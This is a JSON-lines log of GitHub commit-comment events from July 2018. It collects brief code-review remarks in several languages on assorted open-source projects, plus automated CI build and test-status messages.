{"id":"8006982895","type":"CommitCommentEvent","actor":{"login":"nikias"},"repo":{"name":"libimobiledevice/usbmuxd"},"payload":{"comment":{"id":29807215,"position":null,"line":null,"path":null,"commit_id":"ee85938c21043ef5f7cd4dfbc7677f385814d4d8","created_at":"2018-07-23T23:35:10Z","updated_at":"2018-07-23T23:35:10Z","author_association":"MEMBER","body":"Just usbmuxd. Has been there for a while but I never implemented it."}},"created_at":"2018-07-23T23:35:10Z"}
{"id":"8006983123","type":"CommitCommentEvent","actor":{"login":"nayanjyotionline"},"repo":{"name":"garrettcadams/wallet"},"payload":{"comment":{"id":29807216,"position":null,"line":null,"path":null,"commit_id":"11f176de3f69eccdd3d748f84b4ac68ebf033b6e","created_at":"2018-07-23T23:35:15Z","updated_at":"2018-07-23T23:35:15Z","author_association":"NONE","body":"Will you please post the sql file"}},"created_at":"2018-07-23T23:35:15Z"}
{"id":"8006984345","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29807219,"position":null,"line":null,"path":null,"commit_id":"086536e71a5fcc561d31a27a8e8bca81d21afdfb","created_at":"2018-07-23T23:35:40Z","updated_at":"2018-07-23T23:35:40Z","author_association":"OWNER","body":"Yes please.  And make them as polymorphic as possible."}},"created_at":"2018-07-23T23:35:40Z"}
{"id":"8006985496","type":"CommitCommentEvent","actor":{"login":"nayanjyotionline"},"repo":{"name":"garrettcadams/wallet"},"payload":{"comment":{"id":29807224,"position":null,"line":null,"path":null,"commit_id":"c85965a37a22b6811a6862f283b18a43e1c8804e","created_at":"2018-07-23T23:36:02Z","updated_at":"2018-07-23T23:36:02Z","author_association":"NONE","body":"Will you please post the sql file"}},"created_at":"2018-07-23T23:36:02Z"}
{"id":"8006987229","type":"CommitCommentEvent","actor":{"login":"nayanjyotionline"},"repo":{"name":"garrettcadams/wallet"},"payload":{"comment":{"id":29807227,"position":null,"line":null,"path":null,"commit_id":"99f4505dfd5c017c5ecabc828dedf8c455563e33","created_at":"2018-07-23T23:36:36Z","updated_at":"2018-07-23T23:36:36Z","author_association":"NONE","body":"Will you please post the sql file"}},"created_at":"2018-07-23T23:36:36Z"}
{"id":"8006987297","type":"CommitCommentEvent","actor":{"login":"datreeio[bot]"},"repo":{"name":"codefresh-io/cf-plugin-helm"},"payload":{"comment":{"id":29807228,"position":null,"line":null,"path":null,"commit_id":"d0c32d8ec8025a534ef455721da5c82d3dbb26f0","created_at":"2018-07-23T23:36:37Z","updated_at":"2018-07-23T23:36:37Z","author_association":"NONE","body":"\n:crown: Good job! this pull request is aligned with your organization's best practices!\n:speak_no_evil: We don’t have additional insights for this pull request"}},"created_at":"2018-07-23T23:36:37Z"}
{"id":"8006987411","type":"CommitCommentEvent","actor":{"login":"AkihiroSuda"},"repo":{"name":"AkihiroSuda/slirp4netns"},"payload":{"comment":{"id":29807229,"position":37,"line":113,"path":"main.c","commit_id":"2367ee975c7b6f96b32ecf6e837ca27e9c4dc425","created_at":"2018-07-23T23:36:40Z","updated_at":"2018-07-23T23:36:40Z","author_association":"OWNER","body":"This may potentially break rootlesskit \r\nhttps://github.com/rootless-containers/rootlesskit\r\n\r\n\r\nCan we use 10.0.2.100?\r\nWe should make this configurable later though."}},"created_at":"2018-07-23T23:36:40Z"}
{"id":"8006988081","type":"CommitCommentEvent","actor":{"login":"nayanjyotionline"},"repo":{"name":"garrettcadams/wallet"},"payload":{"comment":{"id":29807236,"position":null,"line":null,"path":null,"commit_id":"f1312f317bb0d221da99571b241d5f4567bbd08f","created_at":"2018-07-23T23:36:55Z","updated_at":"2018-07-23T23:36:55Z","author_association":"NONE","body":"Will you please post the sql file"}},"created_at":"2018-07-23T23:36:55Z"}
{"id":"8006988566","type":"CommitCommentEvent","actor":{"login":"AkihiroSuda"},"repo":{"name":"AkihiroSuda/slirp4netns"},"payload":{"comment":{"id":29807239,"position":79,"line":157,"path":"main.c","commit_id":"2367ee975c7b6f96b32ecf6e837ca27e9c4dc425","created_at":"2018-07-23T23:37:06Z","updated_at":"2018-07-23T23:37:06Z","author_association":"OWNER","body":"Can this be optional?"}},"created_at":"2018-07-23T23:37:06Z"}
{"id":"8006991314","type":"CommitCommentEvent","actor":{"login":"Stanzilla"},"repo":{"name":"kemayo/wow-handynotes-legiontreasures"},"payload":{"comment":{"id":29807245,"position":50,"line":163,"path":"config.lua","commit_id":"f5088fa9a0ba09cc233e957654c1c820fd68d353","created_at":"2018-07-23T23:38:04Z","updated_at":"2018-07-23T23:38:04Z","author_association":"NONE","body":"Oh okay, nvm then, thought it was a mistake"}},"created_at":"2018-07-23T23:38:04Z"}
{"id":"8006992374","type":"CommitCommentEvent","actor":{"login":"Boyuptheroad"},"repo":{"name":"Boyuptheroad/railsgirls.github.io"},"payload":{"comment":{"id":29807251,"position":4,"line":274,"path":"_posts/2012-04-18-app.markdown","commit_id":"9c538693076da002e9fbe3deb6e436de018041f3","created_at":"2018-07-23T23:38:27Z","updated_at":"2018-07-23T23:38:27Z","author_association":"OWNER","body":"this is the greatest!i'm just so slow,\r\n"}},"created_at":"2018-07-23T23:38:27Z"}
{"id":"8006995634","type":"CommitCommentEvent","actor":{"login":"AkihiroSuda"},"repo":{"name":"AkihiroSuda/slirp4netns"},"payload":{"comment":{"id":29807253,"position":null,"line":null,"path":null,"commit_id":"8783c16037a2181c83e69f31219b81ffe85b3b18","created_at":"2018-07-23T23:39:41Z","updated_at":"2018-07-23T23:39:41Z","author_association":"OWNER","body":"git add failure?\r\n"}},"created_at":"2018-07-23T23:39:41Z"}
{"id":"8006998148","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29807258,"position":null,"line":null,"path":null,"commit_id":"c057b928320a7aef590e03665d03efc47e5f7bf3","created_at":"2018-07-23T23:40:33Z","updated_at":"2018-07-23T23:40:33Z","author_association":"OWNER","body":"That `Paren` is for adding just a closing `)` is very weird! Otherwise this is nice."}},"created_at":"2018-07-23T23:40:33Z"}
{"id":"8007005335","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/python-can-feedstock"},"payload":{"comment":{"id":29807270,"position":null,"line":null,"path":null,"commit_id":"67a772732f013cd1cd958921ea7f719426cd272b","created_at":"2018-07-23T23:43:09Z","updated_at":"2018-07-23T23:43:09Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @hardbyte was added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-23T23:43:09Z"}
{"id":"8007021169","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29807305,"position":null,"line":null,"path":null,"commit_id":"b5fdacac7c5e24ffd5ae12452a82784be2f75cc1","created_at":"2018-07-23T23:48:52Z","updated_at":"2018-07-23T23:48:52Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-900](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-900).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-900-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-23T23:48:52Z"}
{"id":"8007025651","type":"CommitCommentEvent","actor":{"login":"ClusterM"},"repo":{"name":"ClusterM/hakchi2"},"payload":{"comment":{"id":29807317,"position":null,"line":null,"path":null,"commit_id":"1d18116378d23281c4ba18efb269592780e1b52b","created_at":"2018-07-23T23:50:30Z","updated_at":"2018-07-23T23:50:30Z","author_association":"OWNER","body":"What?"}},"created_at":"2018-07-23T23:50:30Z"}
{"id":"8007028253","type":"CommitCommentEvent","actor":{"login":"WarrenHellman"},"repo":{"name":"RecursiveThinking/recursive_thinking_website_tech_docs"},"payload":{"comment":{"id":29807321,"position":36,"line":29,"path":"scripts/layout.js","commit_id":"b9ed17b73f3fa6358ea9c32e069e810626b0f40c","created_at":"2018-07-23T23:51:27Z","updated_at":"2018-07-23T23:51:27Z","author_association":"CONTRIBUTOR","body":"Cool, I found that later but haven't tried it yet. Thanks! "}},"created_at":"2018-07-23T23:51:27Z"}
{"id":"8007028631","type":"CommitCommentEvent","actor":{"login":"DanTheMan827"},"repo":{"name":"ClusterM/hakchi2"},"payload":{"comment":{"id":29807324,"position":null,"line":null,"path":null,"commit_id":"1d18116378d23281c4ba18efb269592780e1b52b","created_at":"2018-07-23T23:51:35Z","updated_at":"2018-07-23T23:51:35Z","author_association":"COLLABORATOR","body":"Yeah, the special edition shonen jump famicom has no ramdisk, it's also not encrypted like the others"}},"created_at":"2018-07-23T23:51:35Z"}
{"id":"8007032622","type":"CommitCommentEvent","actor":{"login":"JoaoVFG"},"repo":{"name":"JoaoVFG/sysrlog"},"payload":{"comment":{"id":29807327,"position":null,"line":null,"path":null,"commit_id":"c983abf2769235ff1af53209bcb4f22943db825e","created_at":"2018-07-23T23:52:57Z","updated_at":"2018-07-23T23:52:57Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [030 - Criar RotaResource](https://trello.com/c/wA8xFCrn/38-030-criar-rotaresource)"}},"created_at":"2018-07-23T23:52:57Z"}
{"id":"8007036446","type":"CommitCommentEvent","actor":{"login":"ripplelabs-jenkins"},"repo":{"name":"ximinez/rippled"},"payload":{"comment":{"id":29807333,"position":null,"line":null,"path":null,"commit_id":"8e74927a26d310aa0aeb79ceaeeefbded7c583db","created_at":"2018-07-23T23:54:21Z","updated_at":"2018-07-23T23:54:21Z","author_association":"COLLABORATOR","body":"\n## Jenkins Build Summary\n\nBuilt from [this commit](https://github.com/ximinez/rippled/commit/8e74927a26d310aa0aeb79ceaeeefbded7c583db)\n\nBuilt at __20180723 - 23:54:21__\n\n### Test Results\n\nBuild Type | Log | Result | Status\n---------- | --- | ------ | ------\nrpm | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/21//artifact/rpm.txt) | 1029 cases, 96 failed, t: n/a | FAIL :red_circle: \ncoverage | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/21//artifact/coverage.txt) | 1030 cases, 96 failed, t: 585s | FAIL :red_circle: \ndocs | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/21//artifact/docs.txt) | 1 cases, 0 failed, t: 2s | PASS :white_check_mark: \ngcc.release.unity <br/>-Dassert=true, <br/>MANUAL_TESTS=true | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/21//artifact/gcc.release.unity_Dassert_true_MANUAL_TESTS_true.txt) | 1101 cases, 0 failed, t: 802s | PASS :white_check_mark: \nclang.debug.unity | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/21//artifact/clang.debug.unity.txt) | 1030 cases, 96 failed, t: 255s | FAIL :red_circle: \nmsvc.debug | [console](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/21//console) | no test results, t: n/a | FAIL :red_circle: \nclang.debug.nounity | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/21//artifact/clang.debug.nounity.txt) | 1028 cases, 96 failed, t: 264s | FAIL :red_circle: \nclang.debug.unity, <br/>PARALLEL_TESTS=false | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/21//artifact/clang.debug.unity_PARALLEL_TESTS_false.txt) | 1030 cases, 96 failed, t: 492s | FAIL :red_circle: \ngcc.debug.unity | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/21//artifact/gcc.debug.unity.txt) | 1030 cases, 96 failed, t: 250s | FAIL :red_circle: \ngcc.debug.nounity | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/21//artifact/gcc.debug.nounity.txt) | 1028 cases, 96 failed, t: 123s | FAIL :red_circle: \nclang.release.unity <br/>-Dassert=true | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/21//artifact/clang.release.unity_Dassert_true.txt) | 1029 cases, 96 failed, t: 340s | FAIL :red_circle: \ngcc.release.unity <br/>-Dassert=true | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/21//artifact/gcc.release.unity_Dassert_true.txt) | 1029 cases, 96 failed, t: 356s | FAIL :red_circle: \ngcc.debug.unity <br/>-Dstatic=true | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/21//artifact/gcc.debug.unity_Dstatic_true.txt) | 1030 cases, 96 failed, t: 250s | FAIL :red_circle: \nmsvc.debug, <br/>PROJECT_NAME=rippled_classic | [console](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/21//console) | no test results, t: n/a | FAIL :red_circle: \nmsvc.release | [console](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/21//console) | no test results, t: n/a | FAIL :red_circle: \n\n"}},"created_at":"2018-07-23T23:54:21Z"}
{"id":"8007040511","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29807340,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-23T23:55:49Z","updated_at":"2018-07-23T23:55:49Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-23T23:55:49Z"}
{"id":"8007043287","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29807349,"position":null,"line":null,"path":null,"commit_id":"a1cc074f5750d3cc12bc04be8cf8292bb09aff7f","created_at":"2018-07-23T23:56:54Z","updated_at":"2018-07-23T23:56:54Z","author_association":"NONE","body":"FanEnergyIndex (XuanLuoLBL) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2325 of 2325 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a1cc074f5750d3cc12bc04be8cf8292bb09aff7f-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a1cc074f5750d3cc12bc04be8cf8292bb09aff7f-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a1cc074f5750d3cc12bc04be8cf8292bb09aff7f-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.2%25-green.png)</a>\n"}},"created_at":"2018-07-23T23:56:54Z"}
{"id":"8007045031","type":"CommitCommentEvent","actor":{"login":"ptomato"},"repo":{"name":"autoconf-archive/autoconf-archive"},"payload":{"comment":{"id":29807352,"position":110,"line":144,"path":"m4/ax_code_coverage.m4","commit_id":"b5a2d69f7a7e0133733673586231b88464a98d58","created_at":"2018-07-23T23:57:32Z","updated_at":"2018-07-23T23:57:32Z","author_association":"CONTRIBUTOR","body":"This causes a warning if there was any other usage of `GITIGNOREFILES`:\r\n```\r\naminclude_static.am:63: warning: GITIGNOREFILES was already defined in condition TRUE, which includes condition CODE_COVERAGE_ENABLED ...\r\n```"}},"created_at":"2018-07-23T23:57:32Z"}
{"id":"8007046118","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"drag1313/Cash"},"payload":{"comment":{"id":29807353,"position":5,"line":5,"path":".gitignore","commit_id":"c446f061c32cd1dd79d75b2610954a3e72155270","created_at":"2018-07-23T23:57:55Z","updated_at":"2018-07-23T23:57:55Z","author_association":"COLLABORATOR","body":"Не нужно"}},"created_at":"2018-07-23T23:57:55Z"}
{"id":"8007046253","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"drag1313/Cash"},"payload":{"comment":{"id":29807354,"position":11,"line":11,"path":".gitignore","commit_id":"c446f061c32cd1dd79d75b2610954a3e72155270","created_at":"2018-07-23T23:57:58Z","updated_at":"2018-07-23T23:57:58Z","author_association":"COLLABORATOR","body":"Не нужно"}},"created_at":"2018-07-23T23:57:58Z"}
{"id":"8007046404","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"drag1313/Cash"},"payload":{"comment":{"id":29807355,"position":11,"line":11,"path":".gitignore","commit_id":"c446f061c32cd1dd79d75b2610954a3e72155270","created_at":"2018-07-23T23:58:01Z","updated_at":"2018-07-23T23:58:01Z","author_association":"COLLABORATOR","body":"Не нужно"}},"created_at":"2018-07-23T23:58:01Z"}
{"id":"8007047335","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"drag1313/Cash"},"payload":{"comment":{"id":29807358,"position":17,"line":17,"path":".gitignore","commit_id":"c446f061c32cd1dd79d75b2610954a3e72155270","created_at":"2018-07-23T23:58:20Z","updated_at":"2018-07-23T23:58:20Z","author_association":"COLLABORATOR","body":"Не добавил *.iml"}},"created_at":"2018-07-23T23:58:20Z"}
{"id":"8007047517","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29807360,"position":null,"line":null,"path":null,"commit_id":"a1cc074f5750d3cc12bc04be8cf8292bb09aff7f","created_at":"2018-07-23T23:58:23Z","updated_at":"2018-07-23T23:58:23Z","author_association":"NONE","body":"FanEnergyIndex (XuanLuoLBL) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a1cc074f5750d3cc12bc04be8cf8292bb09aff7f-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a>  \n"}},"created_at":"2018-07-23T23:58:23Z"}
{"id":"8007047938","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"drag1313/Cash"},"payload":{"comment":{"id":29807362,"position":17,"line":17,"path":".gitignore","commit_id":"c446f061c32cd1dd79d75b2610954a3e72155270","created_at":"2018-07-23T23:58:32Z","updated_at":"2018-07-23T23:58:32Z","author_association":"COLLABORATOR","body":"out/"}},"created_at":"2018-07-23T23:58:32Z"}
{"id":"8007048216","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"drag1313/Cash"},"payload":{"comment":{"id":29807363,"position":6,"line":6,"path":"src/Cash/Cash.java","commit_id":"c446f061c32cd1dd79d75b2610954a3e72155270","created_at":"2018-07-23T23:58:39Z","updated_at":"2018-07-23T23:58:39Z","author_association":"COLLABORATOR","body":"private "}},"created_at":"2018-07-23T23:58:39Z"}
{"id":"8007050388","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"drag1313/Cash"},"payload":{"comment":{"id":29807368,"position":12,"line":12,"path":"src/Cash/Cash.java","commit_id":"c446f061c32cd1dd79d75b2610954a3e72155270","created_at":"2018-07-23T23:59:28Z","updated_at":"2018-07-23T23:59:28Z","author_association":"COLLABORATOR","body":"printSize()"}},"created_at":"2018-07-23T23:59:28Z"}
{"id":"8007051089","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29807369,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-23T23:59:43Z","updated_at":"2018-07-23T23:59:43Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-23T23:59:43Z"}
{"id":"8001438915","type":"CommitCommentEvent","actor":{"login":"Marcade80"},"repo":{"name":"HermanRonk/Clickfarm"},"payload":{"comment":{"id":29795294,"position":2,"line":3162,"path":"inc/base.js","commit_id":"a02dd0ec0b0fcb7afa6ff3c5c6d77e9d56954342","created_at":"2018-07-23T03:01:20Z","updated_at":"2018-07-23T03:01:20Z","author_association":"CONTRIBUTOR","body":"Pragmatisch zal het niks uitmaken in deze fase van het spel en dit is echt mierenneuken; maar technisch gezien wil je in deze vergelijkingen \"<=\" gebruiken; als je 1000$ hebt en het kost 1000$ dan zou het mogelijk moeten zijn; maar met een \"<\" sign, heb je 1001$ nodig om 1000$ uit te geven."}},"created_at":"2018-07-23T03:01:20Z"}
{"id":"8001443924","type":"CommitCommentEvent","actor":{"login":"MartianLee"},"repo":{"name":"parti-xyz/catan-web"},"payload":{"comment":{"id":29795305,"position":null,"line":null,"path":null,"commit_id":"def17aa26cb76252f48fedcced980ef68a09a957","created_at":"2018-07-23T03:03:36Z","updated_at":"2018-07-23T03:03:36Z","author_association":"CONTRIBUTOR","body":"1. 실수인 것 같습니다. 가이드와 application.js를 다시 확인해 보겠습니다.\r\n2. 테스트가 부족했네요. 수정해 보겠습니다."}},"created_at":"2018-07-23T03:03:36Z"}
{"id":"8001447288","type":"CommitCommentEvent","actor":{"login":"tanir111"},"repo":{"name":"tanir111/JavaFX-Car"},"payload":{"comment":{"id":29795308,"position":1,"line":1,"path":"gonki_2d/src/car/Player.java","commit_id":"bc1d5f55e1cba2628fb71883d5fdee00afaa4446","created_at":"2018-07-23T03:05:05Z","updated_at":"2018-07-23T03:05:05Z","author_association":"OWNER","body":"wfewgwe"}},"created_at":"2018-07-23T03:05:05Z"}
{"id":"8001448046","type":"CommitCommentEvent","actor":{"login":"snoopyjoe"},"repo":{"name":"snoopyjoe/plugin.video.psvue"},"payload":{"comment":{"id":29795312,"position":null,"line":null,"path":null,"commit_id":"c914b2fc5b504881b87a8f0f7985eda4c7bc20ee","created_at":"2018-07-23T03:05:23Z","updated_at":"2018-07-23T03:05:23Z","author_association":"OWNER","body":"That is very weird @DiR3Wolf. I checked the airing ID of the recording and no JSON info was present. When I check the program ID everything is correct but the airing section still has a \"coming up\" badge. I then tried the airing ID again and the second time all the JSON info was there. You're trying to watch this from within the addon correct? My guess is that Sony hasn't loaded all the JSON info in after the recording finished. @eracknaphobia any ideas what may be causing this?"}},"created_at":"2018-07-23T03:05:23Z"}
{"id":"8001450621","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29795318,"position":null,"line":null,"path":null,"commit_id":"c5a5b2a5316dc17bb47c5f9d90e1073df7750308","created_at":"2018-07-23T03:06:30Z","updated_at":"2018-07-23T03:06:30Z","author_association":"OWNER","body":"Build version: __`0.10.0-master.243`__ :crossed_fingers: [`master`](https://github.com/streamich/ci-scripts/tree/master) on [*CircleCI*](https://circleci.com/gh/streamich/ci-scripts/243) :tada:"}},"created_at":"2018-07-23T03:06:30Z"}
{"id":"8001451180","type":"CommitCommentEvent","actor":{"login":"lihuihui123456"},"repo":{"name":"lihuihui123456/test1"},"payload":{"comment":{"id":29795320,"position":null,"line":null,"path":null,"commit_id":"6daf731bf824feccc6e294c56eb2b2b3d6079f99","created_at":"2018-07-23T03:06:44Z","updated_at":"2018-07-23T03:06:44Z","author_association":"OWNER","body":"1"}},"created_at":"2018-07-23T03:06:44Z"}
{"id":"8001452055","type":"CommitCommentEvent","actor":{"login":"yyz277322264"},"repo":{"name":"yyz277322264/CNN_Chinese_ocr_training"},"payload":{"comment":{"id":29795323,"position":null,"line":null,"path":null,"commit_id":"9483df2a8e3283966301bc7b66ec7d764add1270","created_at":"2018-07-23T03:07:07Z","updated_at":"2018-07-23T03:07:07Z","author_association":"OWNER","body":"update the description"}},"created_at":"2018-07-23T03:07:07Z"}
{"id":"8001452324","type":"CommitCommentEvent","actor":{"login":"sumshines"},"repo":{"name":"sumshines/project"},"payload":{"comment":{"id":29795324,"position":6,"line":6,"path":".project","commit_id":"df55691994b3b8ac1b038ddc917e262b0c969d1a","created_at":"2018-07-23T03:07:14Z","updated_at":"2018-07-23T03:07:14Z","author_association":"OWNER","body":"uuu"}},"created_at":"2018-07-23T03:07:14Z"}
{"id":"8001452526","type":"CommitCommentEvent","actor":{"login":"russfiedler"},"repo":{"name":"OceansAus/cice5"},"payload":{"comment":{"id":29795325,"position":null,"line":null,"path":null,"commit_id":"8e87f0a6e9879bacd09e4dfc33b1ce860bea88e3","created_at":"2018-07-23T03:07:18Z","updated_at":"2018-07-23T03:07:18Z","author_association":"NONE","body":"Yeah, I see a comment on a similar line in ice_domain_size.F90 alluding to this. I guess this is done for statically declared arrays but is it done for dynamically allocated arrays? Ugh! Best not to go down that rabbit warren...."}},"created_at":"2018-07-23T03:07:18Z"}
{"id":"8001455264","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29795330,"position":null,"line":null,"path":null,"commit_id":"c5a5b2a5316dc17bb47c5f9d90e1073df7750308","created_at":"2018-07-23T03:08:33Z","updated_at":"2018-07-23T03:08:33Z","author_association":"OWNER","body":"Build version: __`0.10.0-master.368`__ :crossed_fingers: [`master`](https://github.com/streamich/ci-scripts/tree/master) on [*Travis*](https://travis-ci.org/streamich/ci-scripts/builds/406976726) :tada:"}},"created_at":"2018-07-23T03:08:33Z"}
{"id":"8001457678","type":"CommitCommentEvent","actor":{"login":"karthikemr"},"repo":{"name":"knowm/XChange"},"payload":{"comment":{"id":29795339,"position":10,"line":66,"path":"xchange-binance/src/main/java/org/knowm/xchange/binance/BinanceAdapters.java","commit_id":"19d1d5e5b994848ec196c080478829ddccf7d718","created_at":"2018-07-23T03:09:36Z","updated_at":"2018-07-23T03:09:36Z","author_association":"NONE","body":"Currency pair generated is incorrect\r\nConvert(\"NEOBTC\") --> BTC/NEO "}},"created_at":"2018-07-23T03:09:36Z"}
{"id":"8001460130","type":"CommitCommentEvent","actor":{"login":"timothyhsieh"},"repo":{"name":"timothyhsieh/msgu"},"payload":{"comment":{"id":29795343,"position":null,"line":null,"path":null,"commit_id":"5dd1d9581c9c08c47ddb5c4092acff17e06d1ebc","created_at":"2018-07-23T03:10:40Z","updated_at":"2018-07-23T03:10:40Z","author_association":"OWNER","body":"Created multidev environment [msgu#ci-25](https://dashboard.pantheon.io/sites/a133f0bb-8664-4ab1-8026-2ca11ca8aa7e#ci-25).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-25-msgu.pantheonsite.io/)"}},"created_at":"2018-07-23T03:10:40Z"}
{"id":"8001461908","type":"CommitCommentEvent","actor":{"login":"roloxgodlike"},"repo":{"name":"roloxgodlike/rocketmq"},"payload":{"comment":{"id":29795348,"position":null,"line":null,"path":null,"commit_id":"7f109549597cc9329b76036f4bde4d6c062e551f","created_at":"2018-07-23T03:11:27Z","updated_at":"2018-07-23T03:11:27Z","author_association":"OWNER","body":"提升netty-all版本至4.1.x"}},"created_at":"2018-07-23T03:11:27Z"}
{"id":"8001464504","type":"CommitCommentEvent","actor":{"login":"browncrane"},"repo":{"name":"kochedykov/jlibmodbus"},"payload":{"comment":{"id":29795350,"position":107,"line":107,"path":"examples/com/invertor/examples/modbus/SimpleSlaveTCP.java","commit_id":"9bc4059167a9877834993d483a1073f40f0fa3a3","created_at":"2018-07-23T03:12:33Z","updated_at":"2018-07-23T03:12:33Z","author_association":"CONTRIBUTOR","body":"Yes, that would keep the slave simpler. OK, we won't change here."}},"created_at":"2018-07-23T03:12:33Z"}
{"id":"8001468615","type":"CommitCommentEvent","actor":{"login":"gwalvanshi"},"repo":{"name":"gwalvanshi/BillingWebSite"},"payload":{"comment":{"id":29795361,"position":null,"line":null,"path":null,"commit_id":"a67eebfd532cc0b7dab9bc8276b4af66e9f5d218","created_at":"2018-07-23T03:14:20Z","updated_at":"2018-07-23T03:14:20Z","author_association":"OWNER","body":"dshfsdhsd"}},"created_at":"2018-07-23T03:14:20Z"}
{"id":"8001479869","type":"CommitCommentEvent","actor":{"login":"caorol"},"repo":{"name":"jiyuujin/ProgateJava"},"payload":{"comment":{"id":29795380,"position":10,"line":10,"path":"src/io/jiyuujin/java/day21/Characters.java","commit_id":"e4eca0b8c32b0903c2c7518e6b4553983092e615","created_at":"2018-07-23T03:19:11Z","updated_at":"2018-07-23T03:19:11Z","author_association":"COLLABORATOR","body":"getCharacterInfo ね\r\nメソッド名は動詞始まりでしょ？把握してる？"}},"created_at":"2018-07-23T03:19:11Z"}
{"id":"8001482462","type":"CommitCommentEvent","actor":{"login":"zombieJ"},"repo":{"name":"ant-design/ant-design"},"payload":{"comment":{"id":29795384,"position":null,"line":null,"path":null,"commit_id":"8c7dfe45c6f71b33a3cf698d8e48746cb7db9f37","created_at":"2018-07-23T03:20:19Z","updated_at":"2018-07-23T03:20:19Z","author_association":"MEMBER","body":"> #11356 这个没合？\r\n\r\n这个还会再调整一下测试覆盖率，所以没合"}},"created_at":"2018-07-23T03:20:19Z"}
